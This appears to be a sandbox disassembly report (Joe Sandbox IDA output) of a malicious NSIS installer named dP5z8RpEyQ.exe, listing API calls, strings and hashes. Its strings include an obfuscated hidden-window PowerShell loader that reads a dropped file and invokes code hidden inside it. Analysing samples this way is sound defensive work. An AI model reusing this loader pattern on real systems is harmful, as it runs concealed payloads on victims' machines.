                                                                                                    • String ID: "$"C:\Users\user\Desktop\dP5z8RpEyQ.exe"$(y$.tmp$1033$Bysamfund$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skittaget\lektier$C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution$C:\Users\user\Desktop$C:\Users\user\Desktop\dP5z8RpEyQ.exe$Error launching installer$Haste.n$$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                    • API String ID: 562314493-3078951025
                                                                                                    • Opcode ID: c6efd9576a15a3db99a394e629bd7df9bb1422e4c33da2c05e76913c41e6651f
                                                                                                    • Instruction ID: 97d63beb8df843ca38620017436ed0801945ee3064957e10bbaedf14490df2b6
                                                                                                    • Opcode Fuzzy Hash: c6efd9576a15a3db99a394e629bd7df9bb1422e4c33da2c05e76913c41e6651f
                                                                                                    • Instruction Fuzzy Hash: B6C1F7705047816ED7216F759D89A2F3EACAB86306F05453EF182B61D2CB7C8A15CB2F

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405398
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004053A7
                                                                                                    • GetClientRect.USER32(?,?), ref: 004053E4
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053EB
                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040540C
                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040541D
                                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405430
                                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040543E
                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405451
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405473
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405487
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054A8
                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054B8
                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054D1
                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054DD
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004053B6
                                                                                                      • Part of subcall function 0040418D: SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054F9
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000052CD,00000000), ref: 00405507
                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040550E
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405531
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405538
                                                                                                    • ShowWindow.USER32(00000008), ref: 0040557E
                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055B2
                                                                                                    • CreatePopupMenu.USER32 ref: 004055C3
                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055D8
                                                                                                    • GetWindowRect.USER32(?,000000FF), ref: 004055F8
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405611
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564D
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040565D
                                                                                                    • EmptyClipboard.USER32 ref: 00405663
                                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 0040566C
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405676
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040568A
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056A3
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 004056AE
                                                                                                    • CloseClipboard.USER32 ref: 004056B4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 590372296-0
                                                                                                    • Opcode ID: dee1dd70bc3dae44c318a2559c0bf59ef3862208e7b388c7693d8967826c8269
                                                                                                    • Instruction ID: 684cfb1aaa76551445c09ef43b39d8f4d2da16edc43e4b0a600a882252a292b3
                                                                                                    • Opcode Fuzzy Hash: dee1dd70bc3dae44c318a2559c0bf59ef3862208e7b388c7693d8967826c8269
                                                                                                    • Instruction Fuzzy Hash: 4AA16C70900608BFDF119FA4DD89EAE7B79FB48354F00802AFA45BA1A1C7794E51DF58
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNELBASE(75923410,007A0DB8,007A0970,00405B9D,007A0970,007A0970,00000000,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00406453
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040645F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
                                                                                                    • Instruction ID: 7d3207d9493d68405b9bf293567bde81a359e03289c7d5d361232287f2b34f21
                                                                                                    • Opcode Fuzzy Hash: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
                                                                                                    • Instruction Fuzzy Hash: B7D01235504620ABC3405B78AD0C88B7A589F563313218F36F46AF12E0C6748C638ADD

Control-flow Graph

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC0
• ShowWindow.USER32(?), ref: 00403CDD
• DestroyWindow.USER32 ref: 00403CF1
• SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0D
• GetDlgItem.USER32(?,?), ref: 00403D2E
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D42
• IsWindowEnabled.USER32(00000000), ref: 00403D49
• GetDlgItem.USER32(?,00000001), ref: 00403DF7
• GetDlgItem.USER32(?,00000002), ref: 00403E01
• SetClassLongA.USER32(?,000000F2,?), ref: 00403E1B
• SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6C
• GetDlgItem.USER32(?,00000003), ref: 00403F12
• ShowWindow.USER32(00000000,?), ref: 00403F33
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F45
• EnableWindow.USER32(?,?), ref: 00403F60
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F76
• EnableMenuItem.USER32(00000000), ref: 00403F7D
• SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F95
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FA8
• lstrlenA.KERNEL32(0079F568,?,0079F568,00000000), ref: 00403FD2
• SetWindowTextA.USER32(?,0079F568), ref: 00403FE1
• ShowWindow.USER32(?,0000000A), ref: 00404115
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID:
• API String ID: 3282139019-0
• Opcode ID: ec739e9d96bc32f6baab2395f713d9bda4e2b377654e9d8e1af96a71d6295b9f
• Instruction ID: 3358382e01a0dfa2f7aaf81ce727bcb664174c2c7b1baf79b3eefcfdc57a0ccd
• Opcode Fuzzy Hash: ec739e9d96bc32f6baab2395f713d9bda4e2b377654e9d8e1af96a71d6295b9f
• Instruction Fuzzy Hash: 6EC1D171500200AFDB21AF25EE89D2B3AB9EB96706F00453EF641B51F1CB3D9992DB1D

Control-flow Graph

APIs
  • Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
  • Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
• lstrcatA.KERNEL32(1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",00000000), ref: 00403962
• lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skittaget\lektier,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,75923410), ref: 004039D7
• lstrcmpiA.KERNEL32(?,.exe), ref: 004039EA
• GetFileAttributesA.KERNEL32(: Completed), ref: 004039F5
• LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skittaget\lektier), ref: 00403A3E
  • Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F
• RegisterClassA.USER32(007A2700), ref: 00403A7B
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A93
• CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AC8
• ShowWindow.USER32(00000005,00000000), ref: 00403AFE
• GetClassInfoA.USER32(00000000,RichEdit20A,007A2700), ref: 00403B2A
• GetClassInfoA.USER32(00000000,RichEdit,007A2700), ref: 00403B37
• RegisterClassA.USER32(007A2700), ref: 00403B40
• DialogBoxParamA.USER32(?,00000000,00403C84,00000000), ref: 00403B5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skittaget\lektier$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
• API String ID: 1975747703-3145436678
• Opcode ID: 33a654ab319a5143a78b8400df8df2a17f9037dc0bafbe0e038c6009d0731ac5
• Instruction ID: f7990f1d18b0f5a23d57c8cfe7c70d4d4c73fa70df7bf6ac8ad2bf3217d0cd4d
• Opcode Fuzzy Hash: 33a654ab319a5143a78b8400df8df2a17f9037dc0bafbe0e038c6009d0731ac5
• Instruction Fuzzy Hash: 29619570640640AEE610AF659D45F3B3E6CEB8574AF10413EF981B62E3DB7D9D028B2D

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 00402EB2
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\dP5z8RpEyQ.exe,00000400), ref: 00402ECE
  • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405C71
  • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
• GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dP5z8RpEyQ.exe,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00402F1A
• GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
Strings
• Inst, xrefs: 00402F86
• soft, xrefs: 00402F8F
• Null, xrefs: 00402F98
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
• Error launching installer, xrefs: 00402EF1
• "C:\Users\user\Desktop\dP5z8RpEyQ.exe", xrefs: 00402EA1
• C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
• C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
• C:\Users\user\Desktop\dP5z8RpEyQ.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\dP5z8RpEyQ.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
• API String ID: 2803837635-940839292
• Opcode ID: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
• Instruction ID: e6d4fb369877e8ee952de7074d12315c12307524423d8dbd5c49f4dc18488fa3
• Opcode Fuzzy Hash: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
                                                                                                    • Instruction Fuzzy Hash: 3151D271901208AFDF20AF65DD85B6E7AB8EB04755F10813BF500B22D6D77C9E818B9D

Control-flow Graph: rendering omitted (function entry block at 00406167; nodes marked Executed / Not Executed)
APIs
• GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00406292
• GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,subterritories,00000000,00405233,subterritories,00000000), ref: 004062A5
• SHGetSpecialFolderLocation.SHELL32(00405233,759223A0,?,subterritories,00000000,00405233,subterritories,00000000), ref: 004062E1
• SHGetPathFromIDListA.SHELL32(759223A0,: Completed), ref: 004062EF
• CoTaskMemFree.OLE32(759223A0), ref: 004062FB
• lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631F
• lstrlenA.KERNEL32(: Completed,?,subterritories,00000000,00405233,subterritories,00000000,00000000,00799A22,759223A0), ref: 00406371
Strings
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated dumps: same set as listed for the previous function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
• String ID: : Completed$Haste.n$$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$subterritories
• API String ID: 717251189-1336606996
• Opcode ID: e6c4a9fbb4c321ecebe7d36b76985c5b159c9a2176219b4b87ef98d85bb8a455
• Instruction ID: 6e1ed981659f24e818377f3a16580b7a42bd992c39e8c3c65ac9697aa82fb6a7
• Opcode Fuzzy Hash: e6c4a9fbb4c321ecebe7d36b76985c5b159c9a2176219b4b87ef98d85bb8a455
• Instruction Fuzzy Hash: C861E571900210AEEB149F28DC94BBE7BA49B46314F12413FED43B62D1D73C4961CB9E

Control-flow Graph: rendering omitted (function entry block at 00401759; nodes marked Executed / Not Executed)
APIs
• lstrcatA.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ",C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution,00000000,00000000,00000031), ref: 00401798
• CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ",powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ",00000000,00000000,powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ",C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution,00000000,00000000,00000031), ref: 004017C2
  • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1
  • Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
  • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
  • Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,759223A0), ref: 00405257
  • Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
  • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
  • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
  • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated dumps: same set as listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\Public\Pictures\shopkeeping\legio.Per$C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution$Haste.n$$hattepuldes\Stethospasm84\$powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "
• API String ID: 1941528284-406281928
• Opcode ID: 27c6483c7b4cfa6faaba688c328a885ad54841229a436ed7b4835cb8198ee252
• Instruction ID: fd3b8c6ffda923ee712ccabd95e062e364f7e6d0f101aa5c62542bd457b9e8d3
• Opcode Fuzzy Hash: 27c6483c7b4cfa6faaba688c328a885ad54841229a436ed7b4835cb8198ee252
• Instruction Fuzzy Hash: F841B571900114BACF10BFB5CC45DAF36A9EF45368B20833BF522B50E2CA7C8A519B6D

Control-flow Graph: rendering omitted (function entry block at 004030D8; nodes marked Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated dumps: same set as listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: CountTick$wsprintf
• String ID: !y$ !y$ ay$... %d%%
• API String ID: 551687249-830929277
• Opcode ID: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
• Instruction ID: a0ed304c84634e1a182b4cedd43d653909124c4238878ead4aa9bd0ee2fb7366
• Opcode Fuzzy Hash: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
• Instruction Fuzzy Hash: CE516E31800219ABCB10DFA5DA44A9F7BB8EF44756F1481BFE800B72D0C7389F448BA9

Control-flow Graph: rendering omitted (function entry block at 004051FB; nodes marked Executed / Not Executed)
APIs
• lstrlenA.KERNEL32(subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
• lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
• lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,759223A0), ref: 00405257
• SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
• SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
• SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated dumps: same set as listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID: subterritories
• API String ID: 2531174081-2942025731
• Opcode ID: 84dc479b8b7881d3249495fb7370a8664623c8244ac58232fd13fde5de382175
• Instruction ID: 95508abd931072ea88f050004e9a273e6bd30dde68a0f7ca5354031f7b80a04f
                                                                                                    • Opcode Fuzzy Hash: 84dc479b8b7881d3249495fb7370a8664623c8244ac58232fd13fde5de382175
                                                                                                    • Instruction Fuzzy Hash: A521A175900118BBDF119FA9DD809DFBFB9EF09354F1480BAF544B6291C6388E408F98

Control-flow Graph (basic blocks and edges, recovered from the graph rendering)
• 635: 40646f-40648f GetSystemDirectoryA -> 636, 637
• 636: 406491 -> 637
• 637: 406493-406495 -> 638, 639
• 638: 4064a5-4064a7 -> 641
• 639: 406497-40649f -> 638, 640
• 640: 4064a1-4064a3 -> 641
• 641: 4064a8-4064da wsprintfA, LoadLibraryExA
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
• wsprintfA.USER32 ref: 004064BF
• LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same twelve dump regions listed under the preceding function's Memory Dump Source
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%s.dll$UXTHEME$\
• API String ID: 2200240437-4240819195
• Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
• Instruction ID: e4af93c3cdb1388bd8c61da79080aae0fca49bc102c632b45afecef183fab820
• Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
• Instruction Fuzzy Hash: D3F0F63055020AABEF159B64DD0DFEB375CEB08344F1400BAA986E10C1EA78D9258BAD

Control-flow Graph (basic blocks and edges, recovered from the graph rendering)
• 642: 405c9c-405ca6 -> 643
• 643: 405ca7-405cd2 GetTickCount, GetTempFileNameA -> 644, 645
• 644: 405ce1-405ce3 -> 647
• 645: 405cd4-405cd6 -> 643, 646
• 646: 405cd8 -> 647
• 647: 405cdb-405cde
APIs
• GetTickCount.KERNEL32 ref: 00405CB0
• GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CCA
Strings
• nsa, xrefs: 00405CA7
• "C:\Users\user\Desktop\dP5z8RpEyQ.exe", xrefs: 00405C9C
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405C9F
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same twelve dump regions listed under the preceding function's Memory Dump Source
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-50875161
• Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
• Instruction ID: 300c2e40aa17b99eb6a72bfbf7bdfcd49c284ecfca22a4765a13b30c42836751
• Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
• Instruction Fuzzy Hash: B7F08236308308ABEB108F56ED04B9B7B98EF91750F14803BF944DA280D6B599549B68

Control-flow Graph (basic blocks and edges, recovered from the graph rendering)
• 648: 402476-4024a7 call 402bce (x2), call 402c5e -> 655, 656
• 655: 402a5a-402a69
• 656: 4024ad-4024b7 -> 658, 659
• 658: 4024c7-4024ca -> 661, 662
• 659: 4024b9-4024c6 call 402bce, lstrlenA -> 658
• 661: 4024e1-4024e4 -> 666, 667
• 662: 4024cc-4024e0 call 402bac -> 661
• 666: 4024f5-402509 RegSetValueExA -> 670, 671
• 667: 4024e6-4024f0 call 4030d8 -> 666
• 670: 40250b -> 671
• 671: 40250e-4025eb RegCloseKey -> 655
APIs
• lstrlenA.KERNEL32(hattepuldes\Stethospasm84\,00000023,?,00000000,00000002,00000011,00000002), ref: 004024C1
• RegSetValueExA.KERNELBASE(?,?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 00402501
